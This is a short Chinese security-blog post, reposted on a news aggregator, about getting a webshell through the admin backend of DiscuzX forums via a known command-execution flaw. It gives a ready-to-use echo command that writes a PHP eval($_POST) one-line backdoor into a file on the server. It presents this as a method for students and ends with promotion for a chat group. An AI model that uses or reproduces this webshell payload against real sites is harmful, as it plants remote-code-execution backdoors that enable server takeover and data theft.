DiscuzX系列后台GETSHELL附方法

暗月博客
暗月博客
暗月博客
810
文章
0
评论
2019年11月21日20:48:41评论861 views字数 381阅读1分16秒阅读模式
摘要

DiscuzX 系列后台GETSHELL附方法 作者 mOon  www.moonsec.com 最近不少学员来问道 dzx 后台怎么拿WEBSHELL。

DiscuzX系列后台GETSHELL附方法

作者 mOon  www.moonsec.com

最近不少学员来问道 dzx 后台怎么拿WEBSHELL。

最近刚好有个洞洞,不过很多人还是不知道噢,因为很多论坛没有公布具体方法。

wooyun知识库发了恩多Dx的洞洞分析

http://drops.wooyun.org/papers/4611

。。。。。。。。。。。。。。。。。。。

既然可以执行命令。基本上可以拿SHELL

但是有一定的局限。iis基本没权限

linux win  Apache的还是可以的

webshell方法、如下 

echo '^<?php eval($_POST[moon]);?^>' >moon.php&

DiscuzX系列后台GETSHELL附方法

DiscuzX系列后台GETSHELL附方法

没加群的同学记得加群咯。

点击链接加入群【暗月信息安全交流群】:http://jq.qq.com/?_wv=1027&k=XO2uoK

QQ群  131634501 群里有妹子噢

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日20:48:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DiscuzX系列后台GETSHELL附方法http://cn-sec.com/archives/72090.html

发表评论

匿名网友 填写信息